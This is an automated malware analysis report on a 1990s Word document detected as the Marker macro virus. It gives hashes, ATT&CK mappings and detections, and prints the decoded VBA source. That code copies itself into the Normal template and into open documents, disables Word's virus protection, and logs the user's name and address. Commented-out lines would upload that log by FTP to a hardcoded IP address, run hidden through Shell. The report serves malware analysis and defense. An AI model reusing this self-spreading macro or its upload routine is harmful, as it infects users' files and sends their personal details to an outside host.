Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5cd6462015b886f6…

MALICIOUS

Office (OLE)

39.5 KB Created: 1997-09-17 10:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 35362d296b7a59b985edeb9b8e671810 SHA-1: 021eef16e30f42162b2ae03ca753830c0cdd71d9 SHA-256: 5cd6462015b886f6c7edadfd71e9a24158b97698c3b93b8fb188a6f262e84c10
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains VBA macros that utilize the Shell() function, indicating an attempt to execute external commands or download additional payloads. The macro attempts to write data to a file named 'C:\hsf*.sys' and includes hardcoded FTP-like commands to connect to '209.201.88.110' with credentials 'anonymous'/'itsme@'. This suggests the macro is a downloader for a second-stage malicious artifact.

Heuristics 3

  • ClamAV: Doc.Trojan.Marker-31 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Marker-31
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 14785 bytes
SHA-256: 87de60a5f60f7424a93aad82f76f280e8113e4c58678ef1e7db329be30f2c411
Detection
ClamAV: Doc.Trojan.Marker-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()

On Error Resume Next

Const Marker = "<- this is a marker!"

'Declare Variables
Dim SaveDocument, SaveNormalTemplate, DocumentInfected, NormalTemplateInfected As Boolean
Dim ad, nt As Object
Dim OurCode, UserAddress, LogData, LogFile As String

'Initialize Variables
Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
Set nt = NormalTemplate.VBProject.VBComponents.Item(1)

DocumentInfected = ad.CodeModule.Find(Marker, 1, 1, 10000, 10000)
NormalTemplateInfected = nt.CodeModule.Find(Marker, 1, 1, 10000, 10000)


'Switch the VirusProtection ON (modified JA)
 Options.VirusProtection = True


'  If (Day(Now()) = 1) And (System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = False) Then
  
    If DocumentInfected = True Then
      LogData = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)
'    ElseIf NormalTemplateInfected = True Then
 '     LogData = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)
    End If
    
    LogData = Mid(LogData, InStr(1, LogData, "' Log" & "file -->"), Len(LogData) - InStr(1, LogData, "' Log" & "file -->"))
    
    For i = 1 To 4
      LogFile = LogFile + Mid(Str(Int(8 * Rnd)), 2, 1)
    Next i
    LogFile = "C:\hsf" & LogFile & ".sys"
    
    Open LogFile For Output As #1
    Print #1, LogData
    Close #1
    
'   Open "c:\netldx.vxd" For Output As #1
'   Print #1, "o 209.201.88.110"
'   Print #1, "user anonymous"
'   Print #1, "pass itsme@"
'   Print #1, "cd incoming"
'   Print #1, "ascii"
'   Print #1, "put " & LogFile
'   Print #1, "quit"
'   Close #1
    
'    Shell "command.com /c ftp.exe -n -s:c:\netldx.vxd", vbHide
    
'    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = True
    
'  End If


'Make sure that some conditions are true before we continue infecting anything
If (DocumentInfected = True Xor NormalTemplateInfected = True) And _
   (ActiveDocument.SaveFormat = wdFormatDocument Or _
   ActiveDocument.SaveFormat = wdFormatTemplate) Then
   
   
  'Infect the NormalTemplate
  If DocumentInfected = True Then
  
    SaveNormalTemplate = NormalTemplate.Saved
  
    OurCode = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)

    
    'Write a log file of this NormalTemplate infection
    For i = 1 To Len(Application.UserAddress)
      If Mid(Application.UserAddress, i, 1) <> Chr(13) Then
        If Mid(Application.UserAddress, i, 1) <> Chr(10) Then
          UserAddress = UserAddress & Mid(Application.UserAddress, i, 1)
        End If
      Else
        UserAddress = UserAddress & Chr(13) & "' "
      End If
    Next i

    OurCode = OurCode & Chr(13) & _
              "' " & Format(Time, "hh:mm:ss AMPM - ") & _
                     Format(Date, "dddd, d mmm yyyy") & Chr(13) & _
              "' " & Application.UserName & Chr(13) & _
              "' " & UserAddress & Chr(13)


    nt.CodeModule.DeleteLines 1, nt.CodeModule.CountOfLines
    nt.CodeModule.AddFromString OurCode
    
    If SaveNormalTemplate = True Then NormalTemplate.Save
    
  End If


  'Infect the ActiveDocument
  If NormalTemplateInfected = True And _
     (Mid(ActiveDocument.FullName, 2, 1) = ":" Or _
     ActiveDocument.Saved = True) Then
  
    SaveDocument = ActiveDocument.Saved
    
    OurCode = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)

    ad.CodeModule.DeleteLines 1, ad.CodeModule.CountOfLines
    ad.CodeModule.AddFromString OurCode
    
    If SaveDocument = True Then ActiveDocument.Save
      
  End If
  
    
End If

End Sub

' Logfile -->




' 02:30:56 PM - Friday, 26 Mar 1999
' O.B.1. Canobi
' BOOGZI BARBERS ... Food Buster!!!



' 11:24:16 PM - Wednesday, 7 Apr 19
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.